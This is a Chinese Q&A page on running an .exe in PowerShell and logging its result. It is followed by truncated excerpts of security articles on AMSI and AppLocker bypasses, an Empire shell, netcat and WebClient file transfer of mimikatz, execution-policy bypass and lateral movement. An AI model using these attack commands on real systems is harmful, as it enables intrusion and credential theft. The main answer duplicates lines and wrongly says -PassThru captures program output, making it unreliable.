如何在powershell中运行.exe文件并将结果写入日志文件

在 PowerShell 中运行 .exe 文件并将结果写入日志文件，可以通过以下步骤实现：

打开 PowerShell 终端。
使用 Start-Process 命令来运行 .exe 文件，并将结果输出到变量中。例如，假设要运行名为 example.exe 的可执行文件，可以使用以下命令：
使用 Start-Process 命令来运行 .exe 文件，并将结果输出到变量中。例如，假设要运行名为 example.exe 的可执行文件，可以使用以下命令：
- -FilePath 参数指定要运行的 .exe 文件的路径。
- -Wait 参数确保 PowerShell 在 .exe 文件完成运行之前等待。
- -NoNewWindow 参数确保 .exe 文件在当前 PowerShell 窗口中运行，而不是打开一个新窗口。
- -PassThru 参数将 .exe 文件的输出结果返回给 PowerShell。

创建一个日志文件，将结果写入该文件。可以使用 Out-File 命令来实现。例如，以下命令将结果写入名为 log.txt 的日志文件：
创建一个日志文件，将结果写入该文件。可以使用 Out-File 命令来实现。例如，以下命令将结果写入名为 log.txt 的日志文件：
- $result 是之前步骤中保存 .exe 文件结果的变量。
- -FilePath 参数指定要写入的日志文件的路径。

完整的 PowerShell 脚本如下所示：

$result = Start-Process -FilePath "C:\path\to\example.exe" -Wait -NoNewWindow -PassThru
$result | Out-File -FilePath "C:\path\to\log.txt"

这样，你就可以在 PowerShell 中运行 .exe 文件并将结果写入日志文件了。

请注意，以上答案中没有提及任何特定的云计算品牌商，如需了解腾讯云相关产品和产品介绍，建议访问腾讯云官方网站或咨询腾讯云官方客服。

相关·内容

【DB笔试面试511】如何在Oracle中写操作系统文件，如写日志？

题目部分如何在Oracle中写操作系统文件，如写日志？答案部分可以利用UTL_FILE包，但是，在此之前，要注意设置好UTL_FILE_DIR初始化参数。...在CLIENT_INFO列中存放程序的客户端信息；MODULE列存放主程序名，如包的名称；ACTION列存放程序包中的过程名。该包不仅提供了设置这些列值的过程，还提供了返回这些列值的过程。...Oracle的告警日志中？...使用系统存储过程“SYS.DBMS_SYSTEM.KSDWRT(2,V_MESSAGE)”可将信息写入Oracle的告警日志。...如何在Oracle中写操作系统文件，如写日志？可以利用UTL_FILE包，但是，在此之前，要注意设置好UTL_FILE_DIR初始化参数。

28.8K3 0

APT35 启用了新 PowerShell 后门

该后门通过在 .NET 上下文中直接运行而非生成 PowerShell 进程来规避 PowerShell 安全检测。...通过该 IP 地址下载的文件中，发现了名为 WindowsProcesses.exe的文件： △ 关联文件根据 VirusTotal 的检测结果，该文件被 35/68 个引擎检出： △ 检测结果...△ 执行流程解析了相关的 DLL 文件和 API 调用后，开始执行 dll.dll： △ 主要代码攻击者应该是借鉴了 GitHub 上的公开代码片段，在运行时使用 CLR 运行 PowerShell...△ 进程检测但当后门接收到终止进程的命令时，后门反而会生成 powershell.exe` 进程。 △ 部分代码代码中存在大量拼写错误和语法错误，可以认为后门开发者的母语并非英语。...读取 Chrome 和 Edge 浏览器的数据库文件，加密后以 JSON 格式写入文件中。 △ 部分代码日志存储在 C:\\Windows\\Temp\\cup.tmp。

1.1K3 0

从远程桌面服务到获取Empire Shell

只需在文件中写入powershell.exe并再次保存。现在，我们再次在IE中右键单击 ->“将目标另存为”。转到下拉菜单“保存类型”，然后选择“所有文件”。...你已保存的ps1文件将被显示，你可以选择“运行 PowerShell”这会弹出一个PowerShell命令提示符。但当前的PowerShell提示符处于语言约束模式。...现在从不受限的PowerShell中，下载shell并将其直接执行到内存中。...最重要的是将Base64设置为false，防止stager调用powershell.exe。由于受限的语言模式，将导致powershell.exe无法在此处运行。...3.使用以下PS命令将DLL编码为base64，并将结果通过管道传输到一个文本文件中。 $Content = Get-Content .

1.9K4 0

无招胜有招：看我如何通过劫持COM服务器绕过AMSI

在这篇文章中，我们将阐述一种通过劫持COM服务器来绕过AMSI的方法，并分析Microsoft如何在build＃16232中修复该绕过，然后再讨论如何再次绕过微软对该漏洞的修复。...现在我们可以看看微软如何在build＃16232中修复该漏洞。...在进行研究之前，我们需要明白的是：基本上，脚本解释器（如PowerShell）从工作目录加载amsi.dll，而不是从安全路径（如System32）加载它。...由于这个原因，我们可以将PowerShell.exe复制到我们可以写入的目录，并将易受攻击的amsi.dll版本放到这个目录中。...当PowerShell启动时，您将注意到没有任何条目出现：接下来，我们删除易受攻击的AMSI DLL并将PowerShell移动到同一目录。

2.7K7 0

针对黑客的Windows文件传输总结

要启动 Apache Web 服务器，请将要向受害者提供的文件放在/var/www/html中，然后运行命令： systemctl start apache2 现在您将有一个在端口 80 上运行的网络服务器...这不会将 EXE 文件下载并执行到内存中。当PowerShell脚本被下载并直接执行到内存中时，它会将脚本加载到当前会话中，以便可以执行脚本函数。但是，由于执行策略，这可能会带来问题。...PowerShell 命令前面添加powershell -c并将其用双引号引起来，我们可以从 cmd.exe 提示符执行它： powershell.exe -c "(New-Object System.Net.WebClient...关于受害者（第一）： C:\temp\nc.exe -nvlp 443 > mimikatz.exe 当受害者侦听器运行并准备好捕获我们发送的文件并将其保存为 mimikatz.exe 时，我们可以继续从攻击者计算机将...9.使用evil-winrm下载和上传文件作为展示如何在 Windows 受害者上传输文件的最后一种方法，我们将使用一个名为evil-winrm的工具。

6241 1

如何使用Ketshash检测可疑的特权NTLM连接

该工具可以基于下列信息来实现其功能： 1、受监控计算机上的安全事件日志（登录事件）； 2、活动目录中的身份验证事件；工具要求该工具的使用要求用户账号拥有下列权限： 1、访问远程计算机的安全事件日志...； 2、活动目录的读取权限（标准域账户）； 3、计算机在同一时间同步，否则会影响结果； 4、至少安装并配置好PowerShell 2.0；工具下载该工具是一个PowerShell脚本，因此我们只能在支持...除此之外，也可以直接运行下列命令来使用Ketshash： Invoke-DetectPTH Ketshash Runner 1、确保Ketshash.ps1在KetshashRunner.exe...的同一目录下； 2、双击KetshashRunner.exe，根据需要修改设置，并点击运行； Invoke-DetectPTH使用参数解释 Targetcomputers：要检测NTLM...在Windows 10和Server 2016上，启用“内核对象审计”将提供更准确的信息，例如写入LSASS； LogFile：保存结果的日志文件路径； MaxHoursOfLegitLogonPriorToNTLMEvent

8475 0

Python中的NirCmd入门

虽然NirCmd是一个独立的可执行文件，但我们可以使用Python来调用它并将其集成到我们的脚本中。本文将介绍如何在Python中使用NirCmd。...下载完成后，将NirCmd.exe文件放在一个方便的位置，并将其添加到系统路径中。这样，我们就可以在任何位置调用NirCmd命令。使用示例接下来，我们将介绍几个常见的使用示例。...案例：自动截屏并保存假设我们需要编写一个Python脚本，每隔一段时间自动截取屏幕上的内容，并将截图保存到指定的文件夹中。我们可以使用NirCmd来实现这个任务。...', 5)在这个示例中，我们定义了一个screenshot_and_save函数，用于调用NirCmd的截屏命令，并将截图保存到指定的文件路径中。...SikuliX 具有Python编程接口，可在多个平台上运行，支持跨平台自动化。与NirCmd相比，SikuliX更适合进行基于图像的自动化任务，如自动化测试、图像识别等。

4734 0

使用Sysmon和Splunk探测网络环境中横向渗透

当前很难在网络中探测攻击者横向渗透，其中原因有很难获取必要的日志和区别正常与恶意行为。本篇文章介绍通过部署Sysmon并将日志发送到SIEM来探测横向渗透。...本地查看sysmon事件日志，打开事件查看器 - Microsoft - Windows - Sysmon - Operational 如下图可以看到sysmon记录到powershell.exe进程创建...将下列配置写入inputs.conf文件： [WinEventLog://Microsoft-Windows-Sysmon/Operational]disabled = falserenderXml =...然后通过分析当前的Windows事件日志，辨别进程的创建/终止，网络连接的建立/销毁来区别正常与异常的SMB会话。探测攻击者使用PowerShell进行横向渗透。...我们可以看到受害者机器上面WinRM Remote PowerShell 进程（wsmprovhost.exe）启动了ping.exe和systeminfo.exe这两个进程，而且我们可以看到执行的命令参数

2.2K7 0

Powershell绕过执行及脚本混淆

，比如: fc 在 cmd 中，fc 应该输出对应文件夹的子文件夹信息，而在 powershell 中，fc 的全称是 Format-Custom，一个有关格式化输出的命令。...1、与文件系统交互，运行应用程序 2、创建及运行脚本( .ps1 ) 和其他脚本语言一样，支持将命令列表编写成脚本，但是一个 .ps1 文件默认是以记事本打开，而非 powershell 执行(这和 powershell...|powershell.exe -NoP - -noprofile 简写 -NoP，为不加载 windows poweshell 配置文件你也可以从网络上下载脚本并执行，这样就不会写入磁盘和修改配置文件...-Exec bypass 使用 powershell 策略中的 bypass 策略，这种方法不会改变配置或者要求写入磁盘，并且不会有任何的警告或提示，如果你使用 Unrestricted，在运行网上下载的未被签名的脚本时会有警告...powershell.exe -ExecutionPolicy bypass -File helloworld.ps1 -exec bypass 忽略执行策略文件，-File 指定文件。 3.

2.8K0 0

Windows权限提升之AppLocker绕过

注：如果您仍处于 PowerShell 提示符中，请使用“exit”命令返回到 cmd.exe 提示符。必须使 for 循环命令起作用。完美的！...我们还过滤了结果，仅向我们显示我们拥有写入权限的文件夹。将输出截断为仅前 10 个结果，我们可以看到其中 3 个结果具有写入权限！...现在，我们需要做的就是将我们尝试运行的可执行文件复制到我们已确认用户可以写入的标准的文件夹之一中。...由于我们对 TXT 文件具有写入权限，因此我们可以创建备用数据流并将 meterpreter 有效负载嵌入到日志文件中，然后执行它。...-o meterpreter64.exe 现在，meterpreter 负载已位于受害者上，我们可以使用以下命令将其作为 ADS 嵌入到日志文件中： type C:\temp\meterpreter64

4505 0

使用presentationhost.exe绕过AppLocker白名单限制

Presentationhost.exe是一个内置的Windows可执行文件，用于运行XAML浏览器应用程序（即.xbap文件）。...当我们打开.xbap文件，它似乎是在IE中启动的应用程序，但代码实际上是在另一个进程（Presentationhost.exe）中运行，通常是在一个沙箱中以保护用户免受恶意代码的攻击。...点击运行后，将出现一个空白页面。让我们来创建一个简单的UI，即在左侧输入命令右侧输出结果。此外，我还将添加一个带有单击事件的按钮。...以下代码将在Pipeline中运行一些PowerShell命令，并将输出写入到屏幕。.../tree/master 我将已编译的文件包含在了repo中，以便你在锁定环境中运行PowerShell，你可以在此处获取文件。

1.9K2 0

Exploit Leads to Data Exfiltration

POST，该文件被写入: C:\Program Files\ManageEngine\SupportCenterPlus\bin\msiexec.exe /RestAPI/ImportTechnicians...我们可以从Catalina.txt日志中看到当威胁参与者运行fxs.bat(RDP隧道)等特定命令时，应用程序认为进程被挂起(运行30秒以上)并创建一条警告消息 [REDACTED]|[REDACTED...转储之后，攻击者删除了转储文件以隐藏他们的踪迹从LSASS转储中获取凭证后威胁参与者返回到环境中并下载名为ekern.exe通过SSH建立RDP隧道连接，Ekern.exe是plink.exe重命名工具是为了不被发现...shell fm2.jsp在主机上执行他们的初始发现，下面是发送到webshell的GET请求，发现命令传递给cmd参数，该参数作为PowerShell运行 powershell.exe reg query...拖到beachHead，并将其保存为ekern.exe并使用PowerShell下载 powershell.exe (New-Object System.Net.WebClient).DownloadFile

1K3 0

进攻性横向移动

渗透测试人员和红队人员通常通过执行 powershell.exe 在远程主机上运行 base64 编码命令来完成此操作，这将返回一个信标。...这样做的问题是它创建了一个服务并运行了一个 base64 编码的命令，这是不正常的，会引发各种警报并生成日志。...两者之间的区别，尽管 CS 文档说，PsExec (psh) 正在调用 Powershell.exe，并且您的信标将作为 Powershell.exe 进程运行，而没有 (psh) 的 PsExec 将作为...这可以通过 Powershell 中的命令完成，也可以通过 WMI 和 Powershell 远程完成：启用-PSRemoting -Force 从非 CS 的角度来看（用您的二进制文件替换 calc.exe...如视频所示，此方法的问题在于它产生了两个进程：mmc.exe，因为来自 MMC2.0 和 MSBuild.exe 的 DCOM 方法调用。此外，这确实会暂时写入磁盘。

2.2K1 0

Powershell与威胁狩猎

PowerShell v3采用新的cmdlet让管理员能够更深入到系统进程中，这些进程可以制作成可执行的文件或脚本（script）。...Cmdlet包括显示当前目录的Get-Location，访问文件内容的Get-Content和结束运行进程的Stop-Process。...PowerShell v3在Windows Server 8中装载了Windows Management Framework 3.0。PowerShell运行环境也能嵌入到其它应用。...自PowerShell v3版本以后支持启用PowerShell模块日志记录功能，并将此类日志归属到了4103事件。...开始加入了日志转储、ScriptBlock日志记录功能，并将其归入到事件4104当中，ScriptBlock Logging提供了在事件日志中记录反混淆的 PowerShell 代码的能力。

2.6K2 0

PowerShell若干问题的研究

四、Powershell漏洞利用代理工具 Empire最大的特点是以PowerShell脚本作为攻击载荷，而且Empire实现了无需powershell.exe就可运行PowerShell代理功能。...apt-get remove python-pip sudo apt-get autoremove sudo install pip sudo pip install pyopenss 本以为已经可以了，结果运行...例如，在污水攻击中，利用了宏与PowerShell构建了APT攻击，具体过程如下：（1）使用精心构造的钓鱼文档，诱使目标人员打开文档启用宏；（2）文档宏执行后，向文件系统写入脚本及编码过的PowerShell...即为感染标识），则截取当前文档/模板从“LogFile—>”开始的内容即为日志文件内容，存入LogFlie路径所在的文件中。...2.c:\netldx.vxd为ftp的配置文件，其中内容为登录服务209.201.88.110，并将日志文件传到服务器上。 3.注册表中LogFile的值设置为True，表示已上传。

1.5K0 0

ElasticStack日志采集监控搭建实践案例

指定日志文件的位置将日志数据解析为字段并发送到Elasticsearch可视化Kibana中的日志数据。...Step 2.以管理员身份打开PowerShell提示（右键单击PowerShell图标并选择以管理员身份运行）. 切换路径并运行以下命令安装服务。...(可选)设置日志选项以将Winlogbeat日志写入文件： logging.to_files: true logging.files: path: C:\ProgramData\winlogbeat...# 解析验证配置文件 PS d:\logs\Winlogbeat> .\winlogbeat.exe test config -c ....(3) 每个 Harvester 读取新内容的单个日志并将新日志数据发送到Fliebeat Spooler(后台服务),并将将聚合数据发送到输出你为 Filebeat 配置的es中。

2K2 0

OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

的脚本，该脚本对内存中运行的嵌入式的payloads 进行一个base64的编码，并将其压缩为单行代码，连接到ADMIN或者是C share并且运行Powershell命令。...问题是它会创建服务并运行base64编码的命令，这是不正常的，并且会引发各种警报并生成日志。另外，发送的命令是通过命名管道发送的，该管道在CS中具有默认名称（可以更改）。...两者之间的区别，尽管CS文档有说明，PsExec（psh）仍在调用Powershell.exe，并且您的信标将作为Powershell.exe进程运行，而没有（psh）的PsExec将作为rundll32...这可以通过Powershell中的命令完成，也可以通过WMI和Powershell远程完成： Enable-PSRemoting -Force 从非CS的角度来看（用您的二进制文件替换calc.exe）...此方法的问题在于它产生了两个进程：mmc.exe，因为从MMC2.0和MSBuild.exe调用了DCOM方法。另外，这确实会临时写入磁盘。

4.1K1 0

浅谈无文件攻击

浅谈无文件攻击简介与大多数恶意软件不同，“无文件”攻击并不会在目标计算机的硬盘中留下蛛丝马迹，而是直接将恶意代码写入内存或注册表中。由于没有病毒文件，传统基于文件扫描的防病毒软件很难侦测到它们的存在。...因此，攻击者可能会滥用它来执行恶意操作，例如解码、运行或注入可执行有效负载，甚至实现整个勒索软件，如qkG。宏在Office进程的上下文中执行(，例如，Winword.exe)并使用脚本语言实现。...脚本与宏具有相同的优势，它们是文本文件(不是二进制可执行文件)并在解释器的上下文中运行(如wscript.exe、powershell.exe)，这是一个干净而合法的组件。...为了实现攻击的持久化，攻击者们将恶意代码写入注册表的RUN键值，调用合法的rundll32.exe程序执行JavaScript代码，使自己在重启后自动继续运行，并使用Powershell工具执行恶意脚本...启用系统的安全设置，禁用不必要的服务或功能，如PowerShell、宏、WMI等，减少攻击的攻击面。使用行为分析技术，监测系统的异常行为，如进程注入、注册表修改、网络连接等，及时发现和阻止攻击。

2101 0

11.反恶意软件扫描接口 (AMSI)

用户帐户控制或 UAC（EXE、COM、MSI 或 ActiveX 安装的提升） PowerShell（脚本、交互使用和动态代码评估） Windows 脚本解析器（wscript.exe 和 cscript.exe...AMSI一些可能失效的地方比如：从WMI名字空间、注册表、事件日志等非常规位置加载的脚本、不用 powershell.exe 执行(可用网络策略服务器之类的工具)的 PowerShell 脚本等。...通过阅读理解微软文档我们可以知道amsi对宏的检测查杀流程： 1.word等等钓鱼文件加载宏 2.VBA宏运行时,运行时会有一个循环的缓冲区中记录数据和参数调用Win32,COM, VBA等等api的情况...AMSI对这些接口进行检测，可以捕获宏的行为，并将所有相关信息（包括函数名称及其参数）记录在循环缓冲区中。...通过 AMSI 发送的行为日志可能包括诸如从中下载恶意数据的可疑 URL、已知与恶意软件相关联的可疑文件名等信息。

4.3K2 0

你所不知道的Webshell--进阶篇

`n" (Compare-Object good prod -Property hash -PassThru | Where-Object{ 注意：脚本运行需要PowerShell 4.0及以上版本，...结果示例：在 /var/www/html 中存在：test.php 生产环境目录有一个变更或新建的文件：test.php，需要排查此文件是否为Webshell。 ?...该工具能够监测进程创建、文件创建、网络连接等信息，并将监测结果记录到Windows事件日志中。所以可通过分析sysmon日志信息，识别出系统中的异常活动，确认主机是否存在恶意文件。...| Sort-Object -Property value –Unique 结果分析 03 在查询日志的结果中，若发现进程调用可疑文件，则需要进一步排查是否正常的Web应用，判断是否为Webshell...日志查看及分析 03 1)日志查看命令： grep "apacheexecve" /var/log/audit/audit.*4 2)在查询的结果中，若发现进程调用可疑文件，则需要进一步排查是否正常的Web

2K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云